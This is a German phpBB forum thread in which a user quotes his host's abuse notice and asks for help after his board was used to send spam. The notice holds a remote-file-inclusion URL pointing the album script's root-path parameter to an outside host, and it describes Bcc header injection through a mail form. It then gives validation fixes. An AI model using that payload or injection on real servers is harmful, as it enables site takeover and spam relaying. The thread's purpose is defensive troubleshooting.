phpBB2.de Foren-Übersicht  
[netclusive - internet broadcasting]
 FAQ  •  Suchen  •  Download  •  Lesezeichen  •  Mitgliederliste  •  Benutzergruppen   •  Registrieren  •  Profil  •  Einloggen, um private Nachrichten zu lesen  •  Login
 
        
 
        
 

LinkLift

Nächstes Thema anzeigen
Vorheriges Thema anzeigen

Dieses Forum ist gesperrt, du kannst keine Beiträge editieren, schreiben oder beantworten.Dieses Thema ist gesperrt, du kannst keine Beiträge editieren oder beantworten.
Autor Nachricht
EpoX
phpBB2.de User
phpBB2.de User



Anmeldungsdatum: 12.08.2002
Beiträge: 17

BeitragVerfasst am: Sa 10 Nov, 2007 11:04 Antworten mit ZitatNach oben 

Code:
Hallo Herr wie ich soeben bei Wartungsarbeiten am Server festgestellt habe versenden Sie in massen Mails mittels eines php Scripts.Ich möchte Sie darauf aufmerksam machen das wir dies nicht dulden (siehe AGB's) und würde Sie bitten dies zu unterlassen. Das betroffene Script ist http://......./phpBB2//language/lang_english/lang_main_album.php?phpbb_root_path=http://adrianaz.com/media/spaghy.gif?? Bitte prüfen Sie daher Ihre Scripte da diese meist durch eine Sicherheitslücke zum spammen missbraucht werden. In diesem Fall sollten Sie auf diese Scripte verzichten oder aber auf eine aktuellere (sicherere) Version updaten. Mögliche Ursachen sind:  Häufig wird durch Spammer versucht unsichere Formmail Scripte für Spam E-Mails zu missbrauchen.So haben viele Scripte zwar alle ein festes "mail to" hinterlegt, allerdingswurden die zu bespammenden Adressen nicht als "Mail to" eingetragen, sondern als "BCC". Dies funktioniert, wenn man im "From" z.B. folgendes einträgt:  kunde@domain.deBcc: test1@spamopfer.de, test2@spamopfer.de, [... bis 2045 Zeichen] Das Zeichen dient hier als Zeilenumbruch der es ermöglicht weitere Optionen an die Mail anzufügen. Um diesem Missbrauch vorzubeugen ist es notwenig daß man folgende Zeilen in das Formmail Script einfügt:  für Perlchomp $input;die "ungültiges mailformat" unless ($input =~ m/^[a-zA-Z_-.0-9]+@[a-zA-Z_-.0-9]+$/);  Ersetzten Sie die Variable $input durch die Variable, die in Ihrem Script die Mailadresse des Absenders enthält und fügen Siedie veränderte Zeile im Script vor dem Mailversand ein. Damit wird ein einfacher Test auf die Mailadresse angewandt, der den Missbrauch des Scriptes verhindert. für php if(!preg_match( '/^([a-zA-Z0-9])+([.a-zA-Z0-9_-])*@([a-zA-Z0-9_-])+(.[a-zA-Z0-9_-]+)+$/' , $input)) die("ungültiges mailformat");   NMS FormMail (http://nms-cgi.sourceforge.net/scripts.shtml) ist ein Ersatz für das Originalscript ohne die oben beschriebenen Sicherheitslücken.Wir raten Ihnen dringend dazu, ihr FormMail Script durch die NMS FormMail Version zu ersetzen.NMS FormMail wurde speziell für FormMail konzipiert, somit muss an den HTML Forms nichts geändert werden.   Durch den Massenmail Versand schaden Sie am Ende auch sich selbst da der Server mit massenweise Mails belastet ist und die Zustellung normaler Mails länger dauert. Sollten wir den erneuten Spamversand feststellen werden wir uns vorbehalten die entsprechenden Scripte zu sperren.  Mit freundlichen Grüßen


das schreiben erreichte mich von meinem Hoster und da ich nicht grade der pro coder bin Wink brauch ich mal dringend eure hilfe!! was kann soll muss ich jetzt machen ?
OfflineBenutzer-Profile anzeigenPrivate Nachricht senden
Google







Verfasst am: Nach oben

CC Vorsitzender
phpBB2.de User
phpBB2.de User



Anmeldungsdatum: 21.05.2007
Beiträge: 62

BeitragVerfasst am: Sa 10 Nov, 2007 15:13 Antworten mit ZitatNach oben 

lass mal die lang_english/lang_main_album.php rüber wachsen bzw. lad die hier mal hoch als attachment und bau dir unbedingt den ctracker von www.cback.de ein weil der solche angriffe im normalfall blockt
ich seh aber hier handelt es sich um eine datei des albums da würd ich noch raten dies hier durchzuführen >> http://www.phpbb2.de/ftopic45218.html

_________________
My Forum
HiddenBenutzer-Profile anzeigenPrivate Nachricht senden
Beiträge der letzten Zeit anzeigen:      
Dieses Forum ist gesperrt, du kannst keine Beiträge editieren, schreiben oder beantworten.Dieses Thema ist gesperrt, du kannst keine Beiträge editieren oder beantworten.

Nächstes Thema anzeigen
Vorheriges Thema anzeigen
Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst deine Beiträge in diesem Forum nicht bearbeiten.
Du kannst deine Beiträge in diesem Forum nicht löschen.
Du kannst an Umfragen in diesem Forum nicht mitmachen.
Du kannst Dateien in diesem Forum posten
Du kannst Dateien in diesem Forum herunterladen

Ähnliche Beiträge
Thema Autor Forum Antworten Verfasst am
smf Forum zu phpBB2 - ich brauche Hil... Maggan22 phpBB2.x - Installation 1 Sa 01 Aug, 2009 16:17 Letzten Beitrag anzeigen
PHP Forum ohne Serverzugang "aus... sinni800 phpBB2.x - Support 0 Mi 22 Jul, 2009 13:40 Letzten Beitrag anzeigen
Forum über Psyche wie Eifersucht-Depr... schnuckelchen phpBB2.x - Show off 2 Di 30 Jun, 2009 10:32 Letzten Beitrag anzeigen
Board zerschossen? HILFE!!! wi77ard phpBB2.x - Support 2 Sa 27 Jun, 2009 17:08 Letzten Beitrag anzeigen
Hilfe komm net weiter Puddingpanzer Installation / Upgrade 13 So 07 Jun, 2009 19:04 Letzten Beitrag anzeigen